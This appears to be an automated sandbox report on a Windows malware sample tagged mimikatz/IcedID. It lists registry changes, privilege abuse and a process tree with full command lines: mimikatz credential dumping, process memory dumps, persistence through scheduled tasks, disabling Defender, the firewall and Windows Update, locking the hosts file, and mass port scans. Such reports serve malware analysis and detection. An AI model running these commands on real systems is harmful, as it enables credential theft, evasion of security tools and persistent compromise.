Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | suahuuu.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | suahuuu.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | suahuuu.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | suahuuu.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | suahuuu.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | gbvdtzbdv.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | gbvdtzbdv.exe
Modifies registry class 14 IoCs
Processes: suahuuu.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | suahuuu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | suahuuu.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | suahuuu.exe
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: suahuuu.exe
pid | process
2472 | suahuuu.exe (64 entries)
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid    process
668    (process name not recorded; 15 identical entries)
-
Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid    process
3752   2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
-
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
description                    pid    process
Token: SeDebugPrivilege        3752   2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege        1796   suahuuu.exe
Token: SeDebugPrivilege        2472   suahuuu.exe
Token: SeDebugPrivilege        3692   vfshost.exe
Token: SeDebugPrivilege        960    gbvdtzbdv.exe
Token: SeLockMemoryPrivilege   3416   bgjnyg.exe
Token: SeLockMemoryPrivilege   3416   bgjnyg.exe
Token: SeDebugPrivilege        2552   gbvdtzbdv.exe
Token: SeDebugPrivilege        432    gbvdtzbdv.exe
Token: SeDebugPrivilege        3576   gbvdtzbdv.exe
Token: SeDebugPrivilege        960    gbvdtzbdv.exe
Token: SeDebugPrivilege        2864   gbvdtzbdv.exe
Token: SeDebugPrivilege        2116   gbvdtzbdv.exe
Token: SeDebugPrivilege        2156   gbvdtzbdv.exe
Token: SeDebugPrivilege        4260   gbvdtzbdv.exe
Token: SeDebugPrivilege        2380   gbvdtzbdv.exe
Token: SeDebugPrivilege        1064   gbvdtzbdv.exe
Token: SeDebugPrivilege        3724   gbvdtzbdv.exe
Token: SeDebugPrivilege        2136   gbvdtzbdv.exe
Token: SeDebugPrivilege        6180   gbvdtzbdv.exe
Token: SeDebugPrivilege        4400   gbvdtzbdv.exe
Token: SeDebugPrivilege        6536   gbvdtzbdv.exe
Token: SeDebugPrivilege        5944   gbvdtzbdv.exe
Token: SeDebugPrivilege        5224   gbvdtzbdv.exe
Token: SeDebugPrivilege        6796   gbvdtzbdv.exe
Token: SeDebugPrivilege        6668   gbvdtzbdv.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid    process
3752   2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
3752   2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
1796   suahuuu.exe
1796   suahuuu.exe
2472   suahuuu.exe
2472   suahuuu.exe
3864   xohudmc.exe
2748   nspfoo.exe
4856   suahuuu.exe
4856   suahuuu.exe
5936   suahuuu.exe
5936   suahuuu.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid (process)  wrote to memory of  target pid (target process)    entries
3752 (2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe) wrote to memory of 1064 (cmd.exe)   x3
1064 (cmd.exe) wrote to memory of 648 (PING.EXE)   x3
1064 (cmd.exe) wrote to memory of 1796 (suahuuu.exe)   x3
2472 (suahuuu.exe) wrote to memory of 1536 (cmd.exe)   x3
1536 (cmd.exe) wrote to memory of 4144 (cmd.exe)   x3
1536 (cmd.exe) wrote to memory of 4972 (cacls.exe)   x3
1536 (cmd.exe) wrote to memory of 1772 (cmd.exe)   x3
1536 (cmd.exe) wrote to memory of 2288 (cacls.exe)   x3
1536 (cmd.exe) wrote to memory of 4252 (cmd.exe)   x3
1536 (cmd.exe) wrote to memory of 4756 (cacls.exe)   x3
2472 (suahuuu.exe) wrote to memory of 4628 (netsh.exe)   x3
2472 (suahuuu.exe) wrote to memory of 4456 (netsh.exe)   x3
2472 (suahuuu.exe) wrote to memory of 1728 (netsh.exe)   x3
2472 (suahuuu.exe) wrote to memory of 1928 (cmd.exe)   x3
1928 (cmd.exe) wrote to memory of 4092 (wpcap.exe)   x3
4092 (wpcap.exe) wrote to memory of 3692 (net.exe)   x3
3692 (net.exe) wrote to memory of 3864 (net1.exe)   x3
4092 (wpcap.exe) wrote to memory of 3824 (net.exe)   x3
3824 (net.exe) wrote to memory of 960 (net1.exe)   x3
4092 (wpcap.exe) wrote to memory of 1932 (net.exe)   x3
1932 (net.exe) wrote to memory of 1624 (net1.exe)   x3
4092 (wpcap.exe) wrote to memory of 2116 (net.exe)   x1
-
Processes
(indentation shows parent/child depth; each entry gives PID, image path, command line and flagged behaviours)
PID 1884  C:\Windows\System32\spoolsv.exe
  cmdline: C:\Windows\System32\spoolsv.exe
  PID 3416  C:\Windows\TEMP\vleitjdvn\bgjnyg.exe
    cmdline: "C:\Windows\TEMP\vleitjdvn\bgjnyg.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
PID 3752  C:\Users\Admin\AppData\Local\Temp\2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\2024-04-12_e9aa571d6c2ddd4600b7e545b4de3253_hacktools_icedid_mimikatz.exe"
  - Drops file in Windows directory
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID 1064  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lbbdqheb\suahuuu.exe
    - Suspicious use of WriteProcessMemory
    PID 648  C:\Windows\SysWOW64\PING.EXE
      cmdline: ping 127.0.0.1 -n 5
      - Runs ping.exe
    PID 1796  C:\Windows\lbbdqheb\suahuuu.exe
      cmdline: C:\Windows\lbbdqheb\suahuuu.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
PID 2472  C:\Windows\lbbdqheb\suahuuu.exe
  cmdline: C:\Windows\lbbdqheb\suahuuu.exe
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Sets file execution options in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID 1536  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    - Suspicious use of WriteProcessMemory
    PID 4144  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 4972  C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    PID 1772  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 2288  C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    PID 4252  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 4756  C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  PID 4628  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static del all
  PID 4456  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards
  PID 1728  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add filteraction name=BastardsList action=block
  PID 1928  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe /S
    - Suspicious use of WriteProcessMemory
    PID 4092  C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe
      cmdline: C:\Windows\tdtbtjeet\biqhmcbuq\wpcap.exe /S
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Suspicious use of WriteProcessMemory
      PID 3692  C:\Windows\SysWOW64\net.exe
        cmdline: net stop "Boundary Meter"
        - Suspicious use of WriteProcessMemory
        PID 3864  C:\Windows\SysWOW64\net1.exe
          cmdline: C:\Windows\system32\net1 stop "Boundary Meter"
      PID 3824  C:\Windows\SysWOW64\net.exe
        cmdline: net stop "TrueSight Meter"
        - Suspicious use of WriteProcessMemory
        PID 960  C:\Windows\SysWOW64\net1.exe
          cmdline: C:\Windows\system32\net1 stop "TrueSight Meter"
      PID 1932  C:\Windows\SysWOW64\net.exe
        cmdline: net stop npf
        - Suspicious use of WriteProcessMemory
        PID 1624  C:\Windows\SysWOW64\net1.exe
          cmdline: C:\Windows\system32\net1 stop npf
      PID 2116  C:\Windows\SysWOW64\net.exe
        cmdline: net start npf
        PID 4000  C:\Windows\SysWOW64\net1.exe
          cmdline: C:\Windows\system32\net1 start npf
  PID 4652  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c net start npf
    PID 3864  C:\Windows\SysWOW64\net.exe
      cmdline: net start npf
      PID 3712  C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 start npf
  PID 1964  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c net start npf
    PID 3244  C:\Windows\SysWOW64\net.exe
      cmdline: net start npf
      PID 3620  C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 start npf
  PID 2944  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c C:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tdtbtjeet\biqhmcbuq\Scant.txt
    PID 2864  C:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exe
      cmdline: C:\Windows\tdtbtjeet\biqhmcbuq\tgjjdisve.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tdtbtjeet\biqhmcbuq\Scant.txt
      - Executes dropped EXE
      - Loads dropped DLL
  PID 3652  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c C:\Windows\tdtbtjeet\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tdtbtjeet\Corporate\log.txt
    - Drops file in Windows directory
    PID 3692  C:\Windows\tdtbtjeet\Corporate\vfshost.exe
      cmdline: C:\Windows\tdtbtjeet\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  PID 3236  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tubuuvthc" /ru system /tr "cmd /c C:\Windows\ime\suahuuu.exe"
    PID 3812  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 2840  C:\Windows\SysWOW64\schtasks.exe
      cmdline: schtasks /create /sc minute /mo 1 /tn "tubuuvthc" /ru system /tr "cmd /c C:\Windows\ime\suahuuu.exe"
      - Creates scheduled task(s)
  PID 640  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uurhlnhtb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F"
    PID 2116  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 5064  C:\Windows\SysWOW64\schtasks.exe
      cmdline: schtasks /create /sc minute /mo 1 /tn "uurhlnhtb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lbbdqheb\suahuuu.exe /p everyone:F"
      - Creates scheduled task(s)
  PID 2908  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lulpjluuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F"
    PID 2996  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 4688  C:\Windows\SysWOW64\schtasks.exe
      cmdline: schtasks /create /sc minute /mo 1 /tn "lulpjluuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vleitjdvn\bgjnyg.exe /p everyone:F"
      - Creates scheduled task(s)
  PID 2552  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  PID 2340  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  PID 432  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  PID 2944  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static set policy name=Bastards assign=y
  PID 4408  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  PID 564  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  PID 3748  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  PID 2188  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static set policy name=Bastards assign=y
  PID 2960  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  PID 2764  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  PID 1472  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  PID 4832  C:\Windows\SysWOW64\netsh.exe
    cmdline: netsh ipsec static set policy name=Bastards assign=y
    PID 2996  C:\Windows\System32\Conhost.exe
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID 3112  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c net stop SharedAccess
    PID 1208  C:\Windows\SysWOW64\net.exe
      cmdline: net stop SharedAccess
      PID 4296  C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop SharedAccess
  PID 3752  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c netsh firewall set opmode mode=disable
    PID 768  C:\Windows\SysWOW64\netsh.exe
      cmdline: netsh firewall set opmode mode=disable
      - Modifies Windows Firewall
  PID 960  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 788 C:\Windows\TEMP\tdtbtjeet\788.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2340  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c netsh Advfirewall set allprofiles state off
    PID 2960  C:\Windows\SysWOW64\netsh.exe
      cmdline: netsh Advfirewall set allprofiles state off
      - Modifies Windows Firewall
  PID 432  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c net stop MpsSvc
    PID 4356  C:\Windows\SysWOW64\net.exe
      cmdline: net stop MpsSvc
      PID 4384  C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop MpsSvc
  PID 3620  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c net stop WinDefend
    PID 4260  C:\Windows\SysWOW64\net.exe
      cmdline: net stop WinDefend
      PID 2960  C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop WinDefend
  PID 1928  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c net stop wuauserv
    PID 1336  C:\Windows\SysWOW64\net.exe
      cmdline: net stop wuauserv
      PID 784  C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop wuauserv
  PID 2764  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c sc config MpsSvc start= disabled
    PID 1732  C:\Windows\SysWOW64\sc.exe
      cmdline: sc config MpsSvc start= disabled
      - Launches sc.exe
  PID 1156  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c sc config SharedAccess start= disabled
    PID 1132  C:\Windows\SysWOW64\sc.exe
      cmdline: sc config SharedAccess start= disabled
      - Launches sc.exe
  PID 4424  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c sc config WinDefend start= disabled
    PID 2408  C:\Windows\SysWOW64\sc.exe
      cmdline: sc config WinDefend start= disabled
      - Launches sc.exe
  PID 4000  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c sc config wuauserv start= disabled
    PID 2016  C:\Windows\SysWOW64\sc.exe
      cmdline: sc config wuauserv start= disabled
      - Launches sc.exe
  PID 3864  C:\Windows\TEMP\xohudmc.exe
    cmdline: C:\Windows\TEMP\xohudmc.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
  PID 2552  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 384 C:\Windows\TEMP\tdtbtjeet\384.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 432  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 1884 C:\Windows\TEMP\tdtbtjeet\1884.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 3576  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2480 C:\Windows\TEMP\tdtbtjeet\2480.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 960  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2628 C:\Windows\TEMP\tdtbtjeet\2628.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2864  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2696 C:\Windows\TEMP\tdtbtjeet\2696.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2116  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2024 C:\Windows\TEMP\tdtbtjeet\2024.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2156  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 3876 C:\Windows\TEMP\tdtbtjeet\3876.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4260  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 3992 C:\Windows\TEMP\tdtbtjeet\3992.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2380  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 4076 C:\Windows\TEMP\tdtbtjeet\4076.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 1064  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 1384 C:\Windows\TEMP\tdtbtjeet\1384.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 3724  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 2264 C:\Windows\TEMP\tdtbtjeet\2264.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2136  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 4340 C:\Windows\TEMP\tdtbtjeet\4340.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4832  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd.exe /c C:\Windows\tdtbtjeet\biqhmcbuq\scan.bat
    PID 3080  C:\Windows\tdtbtjeet\biqhmcbuq\mfhjlqvzt.exe
      cmdline: mfhjlqvzt.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
      - Executes dropped EXE
      - Drops file in Windows directory
  PID 6180  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 1236 C:\Windows\TEMP\tdtbtjeet\1236.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4400  C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe
    cmdline: C:\Windows\TEMP\tdtbtjeet\gbvdtzbdv.exe -accepteula -mp 676 C:\Windows\TEMP\tdtbtjeet\676.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 5392  C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    PID 2640  C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 5472  C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
